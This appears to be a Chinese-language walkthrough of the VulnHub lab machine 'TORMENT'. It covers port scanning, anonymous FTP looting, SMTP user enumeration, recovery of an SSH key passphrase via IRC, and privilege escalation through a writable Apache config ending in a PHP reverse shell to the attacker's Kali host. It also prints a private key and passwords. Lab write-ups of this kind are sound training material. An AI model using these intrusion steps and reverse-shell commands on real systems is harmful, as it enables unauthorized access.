靶机渗透练习56-digitalworld.local:TORMENT
2024-05-16 02:01:37
靶机描述
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/
Description
This is the evil twin of JOY. Unlike JOY, this machine is designed to drive you crazy. Stephen Hawking once mentioned, “God plays dice and throws them into places where they cannot be seen.”
The dice for the machine can all be found on the Internet. Like all other machines built by me, you should not torment yourself by brute force. But perhaps, JOY and TORMENT are two sides of the same coin of satisfaction? Can we really spark joy if we can’t first be tormented to endure sufferance?
This machine guarantees to teach you some new ways of looking at enumeration and exploitation. Unlike all the other OSCP-like machines written by me, this machine will be mind-twisting and maybe mind-blowing. You may lose your mind while at it, but we will still nudge you to… try harder!
This is NOT an easy machine and you should not feel discouraged if you spend a few days headbanging on this machine. At least three competent pentesters I have asked to test this machine report days (thankfully not weeks) of head banging and nerve wrecking. Do this machine if you enjoy being humbled.
If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): Torment is (#1): what happens when you can’t find your answer on Google, even though it’s there, (#2): what happens when you plead for mercy, but do not succeed, (#3): https://www.youtube.com/watch?v=7ge1yWot4cE
Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.53
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
⬢ TORMENT arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:ab:1a:1b PCS Systemtechnik GmbH
192.168.9.53 08:00:27:1f:47:d2 PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ TORMENT nmap -A -sV -T4 -p- 192.168.9.53
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 14:30 CST
Nmap scan report for bogon (192.168.9.53)
Host is up (0.00034s latency).
Not shown: 65516 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.9.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
| -rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
| -rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
| -rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
| -rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
| -rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
| -rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
| -rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
| -rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
| -rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
| -rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
| -rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 84:c7:31:7a:21:7d:10:d3:a9:9c:73:c2:c2:2d:d6:77 (RSA)
| 256 a5:12:e7:7f:f0:17:ce:f1:6a:a5:bc:1f:69:ac:14:04 (ECDSA)
|_ 256 66:c7:d0:be:8d:9d:9f:bf:78:67:d2:bc:cc:7d:33:b9 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: TORMENT.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=TORMENT
| Subject Alternative Name: DNS:TORMENT
| Not valid before: 2018-12-23T14:28:47
|_Not valid after: 2028-12-20T14:28:47
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25
|_http-title: Apache2 Debian Default Page: It works
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 41233/tcp6 mountd
| 100005 1,2,3 46203/tcp mountd
| 100005 1,2,3 49339/udp mountd
| 100005 1,2,3 49394/udp6 mountd
| 100021 1,3,4 34459/tcp6 nlockmgr
| 100021 1,3,4 36137/tcp nlockmgr
| 100021 1,3,4 53291/udp nlockmgr
| 100021 1,3,4 58511/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 have LITERAL+ ENABLE more ID post-login AUTH=PLAIN listed capabilities OK Pre-login IDLE AUTH=LOGINA0001 SASL-IR LOGIN-REFERRALS
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631/tcp open ipp CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
2049/tcp open nfs_acl 3 (RPC #100227)
6667/tcp open irc ngircd
6668/tcp open irc ngircd
6669/tcp open irc ngircd
6672/tcp open irc ngircd
6674/tcp open irc ngircd
36137/tcp open nlockmgr 1-4 (RPC #100021)
41735/tcp open mountd 1-3 (RPC #100005)
46203/tcp open mountd 1-3 (RPC #100005)
49167/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:1F:47:D2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: TORMENT.localdomain, TORMENT, irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 5h19m57s, deviation: 4h37m07s, median: 7h59m57s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: torment
| NetBIOS computer name: TORMENT\x00
| Domain name: \x00
| FQDN: torment
|_ System time: 2022-03-24T22:30:41+08:00
|_nbstat: NetBIOS name: TORMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-24T14:30:42
|_ start_date: N/ATRACEROUTE
HOP RTT ADDRESS
1 0.34 ms bogon (192.168.9.53)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.82 seconds
⬢ TORMENT
21—ftp—vsftpd 2.0.8 or later—Anonymous FTP login allowed (FTP code 230)
22—ssh—OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25—smtp—Postfix smtpd
80—http—Apache httpd 2.4.25
111—rpcbind—2-4 (RPC #100000)
139—netbios-ssn—Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143—imap—Dovecot imapd
445—netbios-ssn—Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
631—ipp—CUPS 2.2
2049—nfs_acl—3 (RPC #100227)
6667—irc—ngircd
6668—irc—ngircd
6669—irc—ngircd
6672—irc—ngircd
6674—irc—ngircd
36137—nlockmgr—1-4 (RPC #100021)
41735—mountd—1-3 (RPC #100005)
46203—mountd—1-3 (RPC #100005)
49167—mountd—1-3 (RPC #100005)
2.2枚举漏洞
2.2.1 21端口分析
anonymous 无密码匿名登录
⬢ TORMENT ftp 192.168.9.53
Connected to 192.168.9.53.
220 vsftpd (broken)
Name (192.168.9.53:hirak0): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
进行信息收集
ftp> ls -al
229 Entering Extended Passive Mode (|||44686|)
150 Here comes the directory listing.
drwxr-xr-x 11 ftp ftp 4096 Mar 24 22:27 .
drwxr-xr-x 11 ftp ftp 4096 Mar 24 22:27 ..
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .cups
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .ftp
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .imap
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .mysql
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .nfs
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ngircd
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .samba
drwxr-xr-x 2 ftp ftp 4096 Dec 31 2018 .smtp
drwxr-xr-x 2 ftp ftp 4096 Jan 04 2019 .ssh
-rw-r--r-- 1 ftp ftp 112640 Dec 28 2018 alternatives.tar.0
-rw-r--r-- 1 ftp ftp 4984 Dec 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 ftp ftp 95760 Dec 28 2018 apt.extended_states.0
-rw-r--r-- 1 ftp ftp 10513 Dec 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 ftp ftp 10437 Dec 26 2018 apt.extended_states.2.gz
-rw-r--r-- 1 ftp ftp 559 Dec 23 2018 dpkg.diversions.0
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 ftp ftp 229 Dec 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 ftp ftp 505 Dec 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 ftp ftp 295 Dec 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 ftp ftp 281 Dec 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 ftp ftp 208 Dec 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 ftp ftp 1719127 Jan 01 2019 dpkg.status.0
-rw-r--r-- 1 ftp ftp 493252 Jan 01 2019 dpkg.status.1.gz
-rw-r--r-- 1 ftp ftp 493252 Jan 01 2019 dpkg.status.2.gz
-rw-r--r-- 1 ftp ftp 492279 Dec 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 ftp ftp 492279 Dec 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 ftp ftp 489389 Dec 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 ftp ftp 470278 Dec 27 2018 dpkg.status.6.gz
-rw------- 1 ftp ftp 1010 Dec 31 2018 group.bak
-rw------- 1 ftp ftp 840 Dec 31 2018 gshadow.bak
-rw------- 1 ftp ftp 2485 Dec 31 2018 passwd.bak
-rw------- 1 ftp ftp 1575 Dec 31 2018 shadow.bak
226 Directory send OK.
ftp>
好多东西,直接下载下来进行信息收集:wget -r ftp://192.168.9.53:21
查看channels其内容
⬢ TORMENT ls -al
总用量 24
drwxr-xr-x 3 hirak0 kali 4096 3月 24 14:55 .
drwxr-xr-x 6 hirak0 kali 4096 3月 24 14:27 ..
drwxr-xr-x 11 root root 4096 3月 24 14:55 192.168.9.53
-rw-r--r-- 1 root root 33 1月 5 2019 channels
-rw-r--r-- 1 root root 1766 1月 5 2019 id_rsa
-rw-r--r-- 1 root root 1471 3月 24 14:43 torment.txt
⬢ TORMENT cd 192.168.9.53
⬢ 192.168.9.53 ls -al
总用量 4896
drwxr-xr-x 11 root root 4096 3月 24 14:55 .
drwxr-xr-x 3 hirak0 kali 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 112640 12月 28 2018 alternatives.tar.0
-rw-r--r-- 1 root root 4984 12月 23 2018 alternatives.tar.1.gz
-rw-r--r-- 1 root root 95760 12月 28 2018 apt.extended_states.0
-rw-r--r-- 1 root root 10513 12月 27 2018 apt.extended_states.1.gz
-rw-r--r-- 1 root root 10437 12月 26 2018 apt.extended_states.2.gz
drwxr-xr-x 2 root root 4096 3月 24 14:55 .cups
-rw-r--r-- 1 root root 559 12月 23 2018 dpkg.diversions.0
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.1.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.2.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.3.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.4.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.5.gz
-rw-r--r-- 1 root root 229 12月 23 2018 dpkg.diversions.6.gz
-rw-r--r-- 1 root root 505 12月 28 2018 dpkg.statoverride.0
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.2.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.3.gz
-rw-r--r-- 1 root root 295 12月 28 2018 dpkg.statoverride.4.gz
-rw-r--r-- 1 root root 281 12月 27 2018 dpkg.statoverride.5.gz
-rw-r--r-- 1 root root 208 12月 23 2018 dpkg.statoverride.6.gz
-rw-r--r-- 1 root root 1719127 1月 1 2019 dpkg.status.0
-rw-r--r-- 1 root root 493252 1月 1 2019 dpkg.status.1.gz
-rw-r--r-- 1 root root 493252 1月 1 2019 dpkg.status.2.gz
-rw-r--r-- 1 root root 492279 12月 28 2018 dpkg.status.3.gz
-rw-r--r-- 1 root root 492279 12月 28 2018 dpkg.status.4.gz
-rw-r--r-- 1 root root 489389 12月 28 2018 dpkg.status.5.gz
-rw-r--r-- 1 root root 470278 12月 27 2018 dpkg.status.6.gz
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ftp
drwxr-xr-x 2 root root 4096 3月 24 14:55 .imap
drwxr-xr-x 2 root root 4096 3月 24 14:55 .mysql
drwxr-xr-x 2 root root 4096 3月 24 14:55 .nfs
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ngircd
drwxr-xr-x 2 root root 4096 3月 24 14:55 .samba
drwxr-xr-x 2 root root 4096 3月 24 14:55 .smtp
drwxr-xr-x 2 root root 4096 3月 24 14:55 .ssh
⬢ 192.168.9.53 cd .ngircd
⬢ .ngircd ls -al
总用量 12
drwxr-xr-x 2 root root 4096 3月 24 14:55 .
drwxr-xr-x 11 root root 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 33 1月 4 2019 channels
⬢ .ngircd cat channels
channels:
games
tormentedprinter
找到id_rsa,查看其内容
⬢ .ssh ls -al
总用量 12
drwxr-xr-x 2 root root 4096 3月 24 14:55 .
drwxr-xr-x 11 root root 4096 3月 24 14:55 ..
-rw-r--r-- 1 root root 1766 1月 4 2019 id_rsa
⬢ .ssh cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C37F0C31D1560056EA1F9204EC405986U9X/cW7GIiI48TQAzUs5ozEQgexHKiFi2NcoADhs/ax/CTJvZh32k+izzW0mMzl1
mo5HID0qNghIbVbRcN6Zv8cdJ/AhREjy25YZ68zA7GWoyfoch1K/XY0NEnNTchLf
b6k5GEgu5jfQT+pAj1A6jQyzz4A4CGbvD+iEEJRX3qsTlAn6th6dniRORJggnVLB
K4ONTeP4US7GSGTtOD+hwoyoR4zNQKT2Hn/WryoF7LdAXMwf1aNJJJ7YPz1YdSnU
fxXscbOMlXuZ4ouawIVGeYeH85lmOh7aBy5MWsYq/vNC+2pVzVEkRfc6jug1UbdG
hncWxfU92Q47lVuqtc4HPINynD2Q8rBlYrKsEbPqtLyCnBGM/T0Srzztj+IjXUD1
SdbVLmxascquwnIyv2w55vjwJv5dKjLBmrDiY0Doc9YYCGi6cz1p9tsE+G+uRg0r
hGuFXldsYEkoQcJ4iWjsYiqcwWWFfkN+A0rYXqqcDY+aqAy+jXkhyzfmUp3KBz9j
CjR1+7KcmKvNXtjn8V+iv2Nwf+qc2YzBNkBWlwHhxIz6L8F3k3OkqnZUqPKCW2Ga
CNMcIYx3+Gde3aXpHXg4OFALV7y23N8A2h97VOqnnrnED46C39shkA8iiMNdH9mz
87TWgw+wPLbWXJO7G5nJL0qciLV/Eo6atSof3FUx/4WX4fmYeg1Rdy0KgTC1NRGn
VT/YnlBrNW3f7fdhk/YhHbcT9vCg9/Nm3hmzQX/FBP085SgeEA+ebNMzQwPmqcfb
jGpMPdhD7iLmKPwQL3RFTVODjUyzsgJ6kz83aQd80qPClopqp4NFMLwATVpbN858
d4Q0QQGrCRqu2SYaYmVhGo37BJXKE11y0JzWXOhiVLD0I9fBoHDmsKHN4Aw3lbVE
/n+B0Qa1bIMGfXP7J4r7/+4trQCGi7ngVfhtygtg6j/HcoXDy9y15zrHZqKerWd6
6ApM1caan4T0FjqlqTOQsN5GmB9sBCu02VQ1QF3Z4FVA9oW+pkNFxAeKIddG1yLM
5L1ePDgEYjik6vM1lE/65c7fNaO8dndMau4reUnPbTFqKsTA46uUaMyOV6S7nsys
kHGcAXLEzvbC8ojK1Pg5Llok6f8YN+H7cP6vE1yCfx3oU3GdWV36AgBWLON8+Wwc
icoyqfW6E2I0xz5nlHoea/7szCNBI4wZmRI+GRcRgegQvG06QvdXNzjqdezbb4ba
EXRnMddmfjFSihlUhsKxLhCmbaJk5mG2oGLHQcOurvOUPh/qgRBfUf3PTntuUoa0
0+tGGaLYibDNb5eXQ39Bsjzm8BWG/dSK/Qq7UU4Bk2bTKikWQLazPAy482BsZpWI
mXt8ISmJqldgdrtnVvG3zoQBQpspZ6HTojheNazfD4zzvduQguOcKrCNICxoSRgA
egRER+uxaLqNGz+6H+9sl7FYWalMa+VzjrEDU7PeZNgOj9PxLdKbstQLQxC/Zq6+
7kYu2pHwqP2HcXmdJ9xYnptwkuqh5WGR82Zk+JkKwUBEQJmbVxjqWLjCV/CDA06z
6VvrfrPo3xt/CoZkH66qcm9LCTcM3DsLs3UT4B7aH5wk4l5MmpVI4/mx2Dlv0Mkv
-----END RSA PRIVATE KEY-----
⬢ .ssh
可惜不知道是哪个用户的
2.2.2 22 端口分析
一般只能暴力破解,暂时没有合适的字典
2.2.3 25端口分析
⬢ TORMENT enum4linux 192.168.9.53 | tee torment.txt
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 24 15:03:13 2022==========================
| Target Information |==========================
Target ........... 192.168.9.53
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none====================================================
| Enumerating Workgroup/Domain on 192.168.9.53 |====================================================
[+] Got domain/workgroup name: WORKGROUP============================================
| Nbtstat Information for 192.168.9.53 |============================================
Looking up status of 192.168.9.53TORMENT <00> - B <ACTIVE> Workstation ServiceTORMENT <03> - B <ACTIVE> Messenger ServiceTORMENT <20> - B <ACTIVE> File Server Service..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master BrowserWORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup NameWORKGROUP <1d> - B <ACTIVE> Master BrowserWORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service ElectionsMAC Address = 00-00-00-00-00-00=====================================
| Session Check on 192.168.9.53 |=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
⬢ TORMENT
2.2.4 80 端口分析
访问:http://192.168.9.53/
扫描一下目录:gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
⬢ TORMENT gobuster dir -u http://192.168.9.53 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.53
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php
[+] Add Slash: true
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2022/03/24 15:09:07 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/icons/ (Status: 403) [Size: 284]
/manual/ (Status: 200) [Size: 626]
/server-status/ (Status: 403) [Size: 292] ===============================================================
2022/03/24 15:11:00 Finished
===============================================================
⬢ TORMENT
访问:http://192.168.9.53/manual/
2.2.5 631端口分析
网络服务器没有提供太多信息。 nmap 发现的另一个面向公众的服务是 CUPS(通用 UNIX 打印系统)
631/tcp open ipp CUPS 2.2
|_http-title: Bad Request - CUPS v2.2.1
|_http-server-header: CUPS/2.2 IPP/2.1
访问:http://192.168.9.53:631/
当我的浏览器指向该服务并查看Printers选项卡时,我得到了一个用户名列表。
创建一个usernames文件
⬢ TORMENT curl -s http://192.168.9.53:631/printers/ | grep Personal | cut -d/ -f3 | cut -d'&' -f1 > usernames
⬢ TORMENT ls -al
总用量 28
drwxr-xr-x 3 hirak0 kali 4096 3月 24 15:16 .
drwxr-xr-x 6 hirak0 kali 4096 3月 24 14:27 ..
drwxr-xr-x 11 root root 4096 3月 24 14:55 192.168.9.53
-rw-r--r-- 1 root root 33 1月 5 2019 channels
-rw-r--r-- 1 root root 1766 1月 5 2019 id_rsa
-rw-r--r-- 1 root root 1471 3月 24 15:03 torment.txt
-rw-r--r-- 1 root root 104 3月 24 15:16 usernames
⬢ TORMENT
咱们使用msf进行枚举smtp用户
⬢ TORMENT msfconsole -q
msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts 192.168.9.53
rhosts => 192.168.9.53
msf6 auxiliary(scanner/smtp/smtp_enum) > set user_file /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
user_file => /home/kali/vulnhub/digitalworld.local/TORMENT/usernames.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit[*] 192.168.9.53:25 - 192.168.9.53:25 Banner: 220 TORMENT.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.9.53:25 - 192.168.9.53:25 Users found: Patrick, Qiu
[*] 192.168.9.53:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smtp/smtp_enum) >
成功拿到Patrick, Qiu
尝试ssh登录一下
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
patrick@192.168.9.53: Permission denied (publickey).
⬢ TORMENT chmod 600 id_rsa
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
Enter passphrase for key 'id_rsa':
patrick@192.168.9.53: Permission denied (publickey).
⬢ TORMENT ssh -i id_rsa qiu@192.168.9.53
Enter passphrase for key 'id_rsa':
qiu@192.168.9.53: Permission denied (publickey).
⬢ TORMENT 发现需要密码
这个时候想起来,前边ftp里边发现一个.ngircd文件夹
经搜索ngircd是个免费,便携式且轻便的Internet中继聊天服务器
于是我在网上搜索了ngircd配置文件,得到了一个默认密码:wealllikedebian
用户名也在ftp那个文件里有games和tormentedprinter
2.2.6 6667,6668,6669,6672,6674端口分析
我们知道这是通过 Google 进行的 hexchat 聊天。先安装客户端
sudo apt-get install hexchat
打开程序进行相关配置
添加网络--->torment
编辑一下该网络,使用6667,6668,6669,6672,6674端口,密码用wealllikedebian
配置完之后进行连接
成功进入聊天频道,并发现password为:mostmachineshaveasupersecurekeyandalongpassphrase
重新ssh登录一下
⬢ TORMENT ssh -i id_rsa patrick@192.168.9.53
Enter passphrase for key 'id_rsa':
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 4 19:34:43 2019 from 192.168.254.139
patrick@TORMENT:~$
2.3漏洞利用
。。。
2.4权限提升
2.4.1 信息收集
patrick@TORMENT:~$ id
uid=1001(patrick) gid=1001(patrick) groups=1001(patrick)
patrick@TORMENT:~$ sudo -l
Matching Defaults entries for patrick on TORMENT:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser patrick may run the following commands on TORMENT:(ALL) NOPASSWD: /bin/systemctl poweroff, /bin/systemctl halt, /bin/systemctl reboot
patrick@TORMENT:~$ cat /etc/passwd | grep -e '100.*'
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
qiu:x:1000:1000:qiu,,,:/home/qiu:/bin/bash
patrick:x:1001:1001:,,,:/home/patrick:/bin/bash
patrick@TORMENT:~$ find / -iname "*.conf" -type f -perm -o+w -exec ls -ld {} \; 2>/dev/null
-rwxrwxrwx 1 root root 7224 Nov 4 2018 /etc/apache2/apache2.conf
patrick@TORMENT:~$
更改一下/etc/apache2/apache2.conf文件内容
上传一个webshell进行反弹shell
patrick@TORMENT:/tmp$ ls -ld /var/www/html
drwxrwxrwx 2 www-data www-data 4096 Mar 25 00:35 /var/www/html
patrick@TORMENT:/tmp$ cd /var/www/html
patrick@TORMENT:/var/www/html$ wget http://192.168.9.7/php-reverse-shell.php
--2022-03-25 00:40:59-- http://192.168.9.7/php-reverse-shell.php
Connecting to 192.168.9.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2699 (2.6K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’php-reverse-shell.php 100%[=======================================================>] 2.64K --.-KB/s in 0s 2022-03-25 00:40:59 (684 MB/s) - ‘php-reverse-shell.php’ saved [2699/2699]patrick@TORMENT:/var/www/html$
kali进行监听:nc -lvp 6666
访问:http://192.168.9.53/php-reverse-shell.php
⬢ TORMENT nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.7] from bogon [192.168.9.53] 34510
Linux TORMENT 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux01:04:19 up 0 min, 0 users, load average: 2.53, 0.66, 0.22
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(qiu) gid=33(www-data) groups=33(www-data),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner)
sh: 0: can't access tty; job control turned off
$ id
